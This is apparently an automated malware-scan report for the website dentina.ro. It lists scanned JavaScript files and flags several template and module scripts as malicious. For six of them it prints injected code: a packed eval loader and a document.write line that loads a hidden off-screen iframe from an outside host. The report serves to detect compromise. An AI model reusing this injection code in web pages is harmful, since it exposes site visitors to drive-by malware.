Scanned pages/files
Request | Server response | Status |
http://dentina.ro/ | 200 OK Content-Length: 20946 Content-Type: text/html | clean |
http://dentina.ro/media/system/js/caption.js | 403 Forbidden Content-Length: 347 Content-Type: text/html | clean |
http://dentina.ro/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://dentina.ro/templates/yoo_royalplaza/lib/js/addons/base.js | 200 OK Content-Length: 1951 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 1q={1m:5(y,n){3 7=0;$$(y).b(5(4,i){3 8;9(4.C){8=4.C}M 9(4.m.z){8=4.m.z}7=G.7(7,8)});9(n!=1f){7=G.7(7,n)}$$(y).b(5(4,i){3 B=4.k(\'F-E\').o()+4.k(\'F-L\').o()+4.k(\ ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://xwmopje.dns-stuff.com/b6e1db49e2dadd4e3bfa555.tVv9wVHY?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://dentina.ro/templates/yoo_royalplaza/lib/js/addons/accordionmenu.js | 200 OK Content-Length: 1531 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 x=7 E({F:4(j,n,3){0.J({r:\'p\',K:4(2){2.m(\'5\');2.g().m(\'5\')},H:4(2){2.l(\'5\');2.g().l(\'5\')}},3);0.8=j;0.b=n;A(0.3.r){B\'C\':0.q();D;p:0.s()}},s:4(){6 3={}; ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://xwmopje.dns-stuff.com/b6e1db49e2dadd4e3bfa555.tVv9wVHY?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://dentina.ro/templates/yoo_royalplaza/lib/js/addons/fancymenu.js | 200 OK Content-Length: 2847 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('f 1a=d z({1y:9(e,6){4.M({1v:1s.1n.1z,R:1p,1q:o,1g:z.P,14:z.P,1c:z.P,h:1,g:\'r\',1b:1t,Y:\'L.1m\',X:\'L.12\',Z:\'7.1j\'},6);b(!$(e))T;f U=0;4.e=$(e);4.8=[];4.7=[];4. ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://xwmopje.dns-stuff.com/b6e1db49e2dadd4e3bfa555.tVv9wVHY?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://dentina.ro/templates/yoo_royalplaza/lib/js/addons/dropdownmenu.js | 200 OK Content-Length: 3004 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('8 17=f 1x({1w:4(5,9){1.1v({P:\'1y\',Z:\'1h\',V:\'1z\',1C:1u,X:1A,q:\'m\',1D:u.1s.1o,1n:Y},9);8 a=1;1.d=$(5);1.D=1t;1.E=[];1.m=[];i(!1.d)1p;1.d.U({S:4(n){a.m=[];a.B( ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://xwmopje.dns-stuff.com/b6e1db49e2dadd4e3bfa555.tVv9wVHY?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://dentina.ro/templates/yoo_royalplaza/lib/js/template.js | 200 OK Content-Length: 2779 Content-Type: application/javascript | clean |
http://dentina.ro/modules/mod_yoo_carousel/mod_yoo_carousel.js | 200 OK Content-Length: 2922 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('C I=h n({1r:5(d,3){2.o({1b:n.t,Y:n.t,1l:n.t,11:n.t,10:\'.s\',13:\'.1g\',17:\'.a\',16:\'.a-6\',Z:\'.a-1s\',X:1q,1j:1t,z:\'x\',K:0,D:\'1u\',N:\'1v\',M:\'19\',k:1p,9:\ ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://xwmopje.dns-stuff.com/b6e1db49e2dadd4e3bfa555.tVv9wVHY?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://dentina.ro/modules/mod_yoo_search/mod_yoo_search.js | 200 OK Content-Length: 3752 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 1B=2 1E({1v:5(t,4){1.1w({1h:\'c...\',16:\'Y\',13:\'1U.1V\',18:\'1T.c-9\',17:\'h.f\',1j:\'15 e\',1g:\'15 A\',1m:\'1P e 1Q\',1G:\'1R e\',m:\'1W.1X?22=23&21=20&a ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://xwmopje.dns-stuff.com/b6e1db49e2dadd4e3bfa555.tVv9wVHY?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://dentina.ro/plugins/system/yoo_effects/yoo_effects.js.php?lb=1&re=1&sl=1 | 200 OK Content-Length: 35274 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof MooTools=="undefined"){throw"Unable to load Shadowbox, MooTools library not found."}var Shadowbox={};Shadowbox.lib={getStyle:function(B,A){return $(B).getStyle(A)},setStyle:function(D,C,E){D=$(D);if(typeof C!="object"){var A={};A[C]=E;C=A}for(var B in C){D.setStyle(B,C[B])}},get:function(A){return $(A)},remove:function(A){A.parentNode.removeChild(A)},getTarget:function(A){return A.target||{}},preventDefault:function(A){new Event(A).preventDefault()},addEvent:function(C,A,B){$(C).addEve Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dentina.ro
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 22 Apr 2014 07:24:08 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 22 Apr 2014 07:24:10 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: f9db3fee11242c199762efda35e03de9=d2c997984f90b14398aca3a94193beca; path=/
X-Powered-By: PHP/5.3.18
GET / HTTP/1.1
Host: dentina.ro
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 22 Apr 2014 07:24:08 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 22 Apr 2014 07:24:10 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: f9db3fee11242c199762efda35e03de9=d2c997984f90b14398aca3a94193beca; path=/
X-Powered-By: PHP/5.3.18
Second query (visit from search engine):
GET / HTTP/1.1
Host: dentina.ro
Referer: http://www.google.com/search?q=dentina.ro
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dentina.ro
Referer: http://www.google.com/search?q=dentina.ro
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dentina.ro
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dentina.ro/
Result: dentina.ro is not infected or malware details are not published yet.
Result: dentina.ro is not infected or malware details are not published yet.